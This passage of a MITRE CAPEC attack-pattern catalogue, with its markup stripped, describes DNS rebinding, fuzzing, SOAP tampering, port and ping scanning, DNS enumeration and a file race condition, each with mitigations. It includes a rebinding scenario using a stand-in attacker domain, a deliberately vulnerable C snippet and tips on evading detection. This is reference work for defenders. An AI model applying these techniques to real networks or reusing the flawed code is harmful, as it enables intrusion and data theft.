from an outside source. Because the same name resolves to both these IP addresses, browsers will place both IP addresses in the same security zone and allow information to flow between the addresses. The attacker can then use scripts in the content the target retrieved from the attacker in the original message to exfiltrate data from the named internal addresses. This allows attackers to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the attacker identifies, additional attacks are possible. This attack differs from pharming attacks in that the attacker is the legitimate owner of the malicious DNS server and so does not need to compromise behavior of external DNS services. Identify potential DNS rebinding targets An attacker publishes content on their own server with their own name and DNS server. Attract HTTP traffic and explore rebinding vulnerabilities in browsers, flash players of old version. Attacker uses Web advertisements to attract the victim to access attacker's DNS. Explore the versions of web browser or flash players in HTTP request. env-All Old versions that have DNS rebinding vulnerabilities. env-All New versions that have fixed DNS rebinding vulnerabilities. env-All A list of browser's information. No browser's information in HTTP request. Establish initial target access to attacker DNS The first time the target accesses the attackers' content, the attackers' name must be resolved to an IP address. The attacker's DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value. The attacker finds some local active servers. The attacker could not find any active local server. Rebind DNS resolution to target address the target makes a subsequent request to the attackers' content the attackers' DNS server must again be queried, but this time the DNS server returns an address internal to the target's organization that would not be accessible from an outside source. Attacker rebinds victim's internal IP address of these servers with his server name. Attacker fails to rebind victim's internal IP address of these servers with his server name. Determine exploitability of DNS rebinding access to target address The attacker can then use scripts in the content the target retrieved from the attacker in the original message to exfiltrate data from the named internal addresses. The attacker's script is executed in victim's browser. Malicious script is not executed in victim's browser, no HTTP request from the script. Monitor external names resolving to internal addresses. Prevent external names from resolving to internal addresses. Access & exfiltrate data within the victim's security zone The attacker can then use scripts in the content the target retrieved from the attacker in the original message to exfiltrate data from the internal addresses. This allows attackers to discover sensitive information about the internal network of an enterprise. Attacker attempts to use victim's browser as an HTTP proxy to other resources inside the target's security zone. This allows two IP addresses placed in the same security zone. env-Web Attacker tries to scan and access all internal hosts in victim's local network by sending multiple short-lived IP addresses. env-Web Two IP addresses placed in the same security zone communicating each other. Attacker can scan and access all internal hosts in victim's local network by sending multiple short-lived IP addresses. Attacker fails to access internal server's information. Update browser or flash players to the latest version. Prevent external names from resolving to internal addresses. The target browser must access content server from the attacker controlled DNS name. Web advertisements are often used for this purpose. The target browser must honor the TTL value returned by the attacker and re-resolve the attackers' DNS name after initial contact. Very High High Protocol Manipulation Injection The attacker registers a domain name, such as www.evil.com with IP address 1.3.5.7, delegates it to his own DNS server (1.3.5.2), and uses phishing links or emails to get HTTP traffic. Instead of sending a normal TTL record, the DNS server sends a very short TTL record (for example, 1 second), preventing DNS response of entry[www.evil.com, 1.3.5.7] from being cached on victim's (192.168.1.10) browser. The attacker's server first responds to the victim with malicious script such as JavaScript, containing IP address (1.3.5.7) of the server. The attacker uses XMLHttpRequest (XHR) to send HTTP request or HTTPS request directly to the attackers' server and load response. The malicious script allows the attacker to rebind the host name to the IP address (192.168.1.2) of a target server that is behind the firewall. Then the server responds to attacker's real target, which is an internal host IP (192.168.1.2) in the same domain of the victim (192.168.1.10). Because the same name resolves to both these IP addresses, browsers will place both IP addresses (1.3.5.7 and 192.168.1.2) in the same security zone and allow information to flow between the addresses. Further, the attacker can achieve scanning and accessing all internal hosts in victim's local network (192.168.X.X). by sending multiple short-lived IP addresses. Medium Setup DNS server and attacker's web server. Write malicious script to allow victim to connect to web server. The attacker must serve some web content that a victim accesses initially. This content must include executable content that queries the attackers' DNS name (to provide the second DNS resolution) and then performs the follow-on attack against the internal system. The attacker also requires a customized DNS server that serves an IP address for their registered DNS name, but which resolves subsequent requests by a single client to addresses internal to that client's network. Design: IP Pinning causes browsers to record the IP address to which a given name resolves and continue using this address regardless of the TTL set in the DNS response. Unfortunately, this is incompatible with the design of some legitimate sites. Implementation: Reject HTTP request with an malicious Host header Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism A vector specifically crafted to poison DNS cache, so that all traffic is redirected to an unintended destination. DNS TTL record HTTP request with malicious DNS rebinds Victim's browser and victim's local network This attack allows attackers to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the attacker identifies, additional attacks are possible. 247 Targeted 1000 Attack Pattern ChildOf 272 http://capec.mitre.org/data/definitions/272.html Exploitation Penetration High High High Client-Server All All All Collin Jackson Adam Barth Andrew Bortz Weidong Shao Dan Boneh Protecting Browsers from DNS Rebinding Attacks In Proceedings of ACM CCS 07 Wikipedia DNS rebinding The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/DNS_rebinding Wendy Jin Cigital, Inc. Pre-review - 0.1 Wendy Jin Cigital, Inc. Pre-review - 0.1 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required 1000 Attack Pattern ChildOf 272 1000 Attack Pattern ChildOf 272 An attacker manipulates functions and/or their values used by web-related protocols to cause a web application or service to react differently that intended, allowing the attacker to gain access to data or resources normally restricted or to cause the application or service to crash. This can either be performed through the manipulation of call parameters with unexpected values or by calling functions that should normally be restricted or limited. The targeted application or service must rely on web service protocols in such a way that malicious manipulation of them can subvert functionality. The attacker must be able to manipulate the targeted application or service. Design: Range, size and value and consistency verification for any arguments supplied to applications and services from external sources and devise appropriate error response. Design: Ensure that function calls that should not be manipulated by a user are not accessible to them. 1000 Attack Pattern ChildOf 272 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Relationships, Resources_Required, Solutions_and_Mitigations, Type (Category -> Attack_Pattern) 1000 Attack Pattern ChildOf 278 Fuzzing is a software testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system. An attacker can leverage fuzzing to try to identify weaknesses in the system. For instance fuzzing can help an attacker discover certain assumptions made in the system about user input. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions without really knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve his goals. Observe communication and inputs The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems. Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters. env-Local env-Embedded Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.) env-Web The attacker creates a list of unique communications packets, messages, inputs, API calls or other actions the software takes. Alert on promiscuous mode. Some network devices (switches, hubs) or monitoring stations (e.g., IDS) can detect and alert when a station in the network is passively eavesdropping. Some production hardware (for embedded environments) can have debugging disabled on the hardware. Techniques exist to insert no-ops and other null branches that thwart basic attempts to execute software stepwise in a debugger. Generate fuzzed inputs Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer. Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80). env-All Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system. env-Local env-Embedded Log unexpected parameters to API calls or system calls. Profile the software's expected use of system calls. Use a sandboxing technique to restrict its API calls to the expected patterns. SSL or other link-layer encryption techniques (VPN, 802.11x, etc.) can impair simple observation and require a would-be attacker to work much harder to get information about the operation of the software.. Observe the outcome Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input. The software produces an indicator that the attacker can see (error message, altered error state in a protocol, etc.). env-All The previous step led to plausible, practical fuzz inputs. env-All If the software's indicators (error messages, etc.) vary clearly based on the attackers' input, then the attacker has a sufficient starting point for customizing his attack. The attacker is unable to induce unexpected failures or output based fuzzed inputs. Craft exploit payloads Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system. Identify and embed shell code for the target system. env-All Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.) env-Web env-CommProtocol env-Peer2Peer env-ClientServer Induce denial of service by exploiting resource leaks or bad error handling. env-All Monitor system logs and alert on unusual activity. Most shell code and unusual activity appears in logs. Medium High Analysis Injection Brute Force A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system. Low There is a wide variety of fuzzing tools available. Fuzzing tools. A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP. Take pauses between fuzzing attempts (may not be very practical). Spoof IP addresses so that it does not look like all data is coming from the same source. Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made. Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior. Integrity Modify memory Availability Unexpected State Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Alter execution logic 74 Targeted 388 Targeted 20 Targeted 728 Secondary 1000 Category ChildOf 223 Reconnaissance Medium Medium Medium All All All All Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary An attacker sends a SOAP message where the field values are other than what the server is likely to expect in order to precipitate non-standard server behavior. In a SOAP message, parameters take the form of values within XML elements. The server will have an XML schema that indicates certain restrictions on these parameter values. For example, the server may expect a parameter to be a string with fewer than 10 characters, or a number less than 100. In a SOAP parameter tampering attack, an attacker either violates this schema, or takes advantage of flexibility within the scheme (for example, a lack of a character limit) to provide parameters that a server might not expect. Examples of unexpected parameters include oversized data, data with different data types, inserting metacharacters within data, and sending contextually inappropriate data (for example, sending a non-existent product name in a product name field or using an out-of-order sequence number). Results of this attack can include information disclosure, denial of service, or even execution of arbitrary code. The targeted server either fails to verify that data in SOAP messages conforms to the appropriate XML schema, or it fails to correctly handle the complete range of data allowed by the schema. Medium The attacker must be able to craft arbitrary SOAP messages and send them to the targeted server. 1000 Attack Pattern ChildOf 279 Navya Sidharth Jigang Liu Resistant SOAP Messaging with IAPF Shreeraj Shah Web 2.0 Security: Defending Ajax, RIA, and SOA Chapter 12. SOA Attack Vectors and Scanning for Vulnerabilities: Parameter Tampering Course Technology PTR December 04, 2007 http://my.safaribooksonline.com/9781584505501/ch12lev1sec4 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker performs an analysis of a target system, protocol, message, or application in order to overcome protections on the target or as a precursor to other attacks. Analysis can involve dissection of an application, analysis of message patterns, formal analysis of protocols, or other methods. The outcome of these attacks can be disclosure of sensitive information, or disclosure of security configuration that leads to further attacks targeted to discovered weaknesses. Any entity that can be observed by an attacker could potentially be vulnerable to an analysis attack. Medium Most analysis attacks require tools in order to collect information about the target. For example, scanning suites and packet sniffers might be used to analyze a web service or protocol. Moreover, following collection of information, some attacks require additional tools in order to process the discovered data. Cryptanalysis applications are one example of such tools. Finally, some of these attacks require a high level of sophistication on the part of an attacker in order to extract useful results from collected information. Implementation: When possible, minimize the information a system displays about itself, including minimizing unnecessary information in error messages and other descriptive messages. Design: Utilize techniques to minimize covert information. For example, intentionally throttling network throughput can hide an entities true throughput potential. 330 Secondary 514 Secondary 200 Secondary 1000 Category ChildOf 210 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a 'Ping Sweep'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the attacker is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An attacker can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc. The attackers goal is to discover as many potential targets as possible can utilize a wide range of techniques to achieve this end. ICMP pings have the following characteristics: 1. Host Discovery: Can be used to discover if a host is alive via ICMP Echo Reply Message 2. Effective Against: LANs or Internal IP address ranges where firewall or ACL rules are less restrictive 3. Weak Against: Firewalls properly configured to block ICMP Echo Request and Echo Replies. 4. Port State: Unable to determine the status of ports on a host. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed. Low Ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities. 1000 Attack Pattern ChildOf 292 Ping Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 44-51 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.5.2 Ping Scan (-SP), pg. 58 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in network reconnaissance operations to gather information about a target network or its hosts. Network Reconnaissance techniques can range from stealthy to noisy and utilize different tools and methods depending upon the scope of the reconnaissance. Some techniques may target single hosts while others are used against entire network address ranges, such as a CIDR class C or B network. In general, reconnaissance activities fall into 5 distinct categories. 1. Host Discovery: The ICMP methods, as well as messages of other protocol types, commonly UDP and TCP, to determine if a host is active on an IP address. 2. Port Scanning: The application of various methods to determine the status of the ports on the remote device. Each machine can have a possible 65535 UDP and TCP ports that provide a service to network clients. The goal of port scanning is to determine which ports on a machine are open, as well as which ports are firewalled or filtered. 3. Operating System Fingerprinting: use of various probing methods to determine idiosyncratic behaviors of a remote device that allow the attacker to determine the operating system. Although networking protocols are governed by standards, each operating system exhibits unique characteristics of its implementation of these standards. By sending malformed packets or datagrams an attacker can solicit responses from an device that allow a highly reliable inference about its operating system. 4. Service Enumeration: Application-layer services can run on arbitrary ports, so an attacker must probe or interact with a remote port in order to obtain a fingerprint or signature of the application or protocol daemon using the port for communication. 5. Firewall Auditing: An attacker uses a number of techniques to determine which types of data can be infiltrated or exfiltrated through a firewall. These techniques require a responsive host protected by a firewall so that the attacker can map out which types of protocols and message types reach the' host or hosts and generate a response. Applied together these activities allow an attack to map out a target network, its topology, as well as gather detailed device configuration information. Network Layer Server-side Host The ability to send data to hosts on a target network segment and receive responses. Low Each type of reconnaissance uses specific tools and methodologies to acquire information from the target. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 38-39 6th Edition McGraw Hill 2009 Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.1 Introduction, pg. 47 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its enormous advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method the primary advantages of SYN scanning are its universality and speed. RFC 793 defines the required behavior of any TCP/IP device in that an incoming connection request begins with a SYN packet, which in turn must be followed by a SYN/ACK packet from the receiving service. For this reason, like TCP Connect scanning, SYN scanning works against any TCP stack. Unlike TCP Connect scanning, it is possible to scan thousands of ports per second using this method. This type of scanning is usually referred to as 'half-open' scanning because it does not complete the three-way handshake. The scanning rate is extremely fast because no time is wasted completing the handshake or tearing down the connection. TCP SYN scanning can also immediately detect 3 of the 4 important types of port status: open, closed, and filtered. When a SYN is sent to an open port and unfiltered port, a SYN/ACK will be generated. This technique allows an attacker to scan through stateful firewalls due to the common configuration that TCP SYN segments for a new connection will be allowed for almost any port. When a SYN packet is sent to a closed port a RST is generated, indicating the port is closed. When SYN scanning to a particular port generates no response, or when the request triggers ICMP Type 3 unreachable errors, the port is filtered. A TCP Connect scan has the following characteristics: 1. Speed: TCP SYN scanning is fast compared to other types of scans. 2. Stealth: TCP SYN scanning is stealthy and SYN scan detection is fraught with false positives. 3. Open Port: Detects that a port is open via a successful SYN/ACK to the SYN. 4. Closed Port: Detects that a port is closed via a successful RST to the SYN 5. Filtered Port: No response, or ICMP messages, indicates the presence of a filter. 6. Unfiltered Port: Cannot distinguish between a state-fully filtered port and an unfiltered port. SYN scanning is fast and provides the attacker with a wealth of information. The primary drawback is that SYN scanning requires the ability to access "raw sockets" in order to create the packets. As a result, it is not possible to perform a SYN scan from some systems (Windows XP SP 2). On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket. Transport Layer Server-side Host Service RFC 793 Flag A TCP SYN "synchronize" flag is the first step in the procedures to establish new TCP connections. This control flag is used to initialize a three-way handshake. The logic of the Transmission Control Block (TCB) dictates that any host that receives a SYN packet to an open port must respond with a "SYN/ACK" packet in acknowledgement. 8 Any data in the payload portion of a TCP SYN packet is ignored for the purpose of establishing a connection. Uses Protocol This scan type is not possible with some operating systems (Windows XP SP 2). On Linux and Unix systems it requires root privileges to use raw sockets. Low The ability to send TCP SYN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.32 TCP SYN (Stealth) Scan, pg. 100 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites An attacker sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a 'Ping Sweep'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the attacker is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An attacker can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc. The attackers goal is to discover as many potential targets as possible can utilize a wide range of techniques to achieve this end. ICMP pings have the following characteristics: 1. Host Discovery: Can be used to discover if a host is alive via ICMP Echo Reply Message 2. Effective Against: LANs or Internal IP address ranges where firewall or ACL rules are less restrictive 3. Weak Against: Firewalls properly configured to block ICMP Echo Request and Echo Replies. 4. Port State: Unable to determine the status of ports on a host. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed. Low Ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 292 Ping Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 44-51 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.5.2 Ping Scan (-SP), pg. 58 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Description Summary ICMP Echo Request Ping "Infrastructure-based footprinting involves interacting with available network or application resources for the purpose of gathering information about the architecture, topology, configuration, or potential vulnerabilities and exposures of a target networking infrastructure." Network Layer Transport Layer Server-side Network Host Service Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 286 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 38-39 6th Edition McGraw Hill 2009 This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. The typical example is the file access. The attacker can leverage a file access race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker could do something such as replace the file and cause an escalation of privilege. The attacker explores to gauge what level of access he has. The attacker confirms access to a resource on the target host. The attacker confirms ability to modify the targeted resource. The attacker decides to leverage the race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker can replace the resource and cause an escalation of privilege. A resource is access/modified concurrently by multiple processes. The attacker is able to modify resource. A race condition exists while accessing a resource. High High Time and State Modification of Resources The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. CVE-2007-1057 The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name. C include <sys/types.h> include <fcntl.h> include <unistd.h> define FILE "/tmp/myfile" define UID 100 void test(char *str) { int fd; fd = creat(FILE, 0644); if(fd == -1) return; chown(FILE, UID, -1); /* BAD */ close(fd); } int main(int argc, char **argv) { char *userstr; if(argc > 1) { userstr = argv[1]; test(userstr); } return 0; } [R.29.3] Medium This attack can get sophisticated since the attack has to occur within a short interval of time. Vulnerability testing tool can be used to probe for race condition. The attacker may also look for temporary file creation. The attacker may try to replace them and take advantage of a race condition. Use safe libraries to access resources such as files. Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition. Use synchronization to control the flow of execution. Use static analysis tools to find race conditions. Pay attention to concurrency problems related to the access of resources. Integrity Modify memory Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Alter execution logic Confidentiality Read application data Availability DoS: resource consumption (CPU) Denial of Service 367 Targeted 368 Secondary 366 Secondary 370 Secondary 362 Secondary 662 Targeted 691 Targeted 663 Targeted 665 Secondary 1000 Attack Pattern ChildOf 26 1000 Category ChildOf 172 Least Privilege Exploitation High High Low All All All All J. Viega G. McGraw Building Secure Software Addison-Wesley 2002 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Fortify Software SAMATE - Software Assurance Metrics And Tool Evaluation Test Case ID 1598 National Institute of Standards and Technology (NIST) 2006-06-22 http://samate.nist.gov/SRD/view_testcase.php?tID=1598 Eric Dalci Cigital, Inc 2007-01-25 Eric Dalci Cigital, Inc 2007-01-25 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Flow, Attack Prerequisites and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Code_Example_Language and Example-Instance_Description Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Flow, Attack Prerequisites and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a Firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible. Application Layer Server-side Service Access to a DNS server that will return the MX records for a network. Low A command-line utility or other application capable of sending requests to the DNS server is necessary. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 309 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 38 6th Edition McGraw Hill 2009 An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization's internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed. Application Layer Server-side Service Access to a DNS server that allows Zone transfers. Low A client application capable of interacting with the DNS server or a command-line utility or web application that automates DNS interactions. Confidentiality Read application data 1000 Attack Pattern ChildOf 309 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 34 6th Edition McGraw Hill 2009 An attacker sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. An attacker usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as 'Ping' scanning using a sonar analogy. The goal of the attacker is to send a packet through to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the attacker can identify a functional host based on its response. An attack of this nature is usually carried out with a 'ping sweep' where a particular kind of ping is sent to a range of IP addresses. Network Layer Transport Layer Server-side Network Host A network capable of routing the attackers' packets to the destination network. Low The resources required will differ based upon the type of host discovery being performed. Usually a scanner or scanning script is required due to the volume of requests that must be generated. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 309 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 1: Footprinting, pp.44 6th Edition McGraw Hill 2009 Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.6 Host Discover Techniques, pg.57 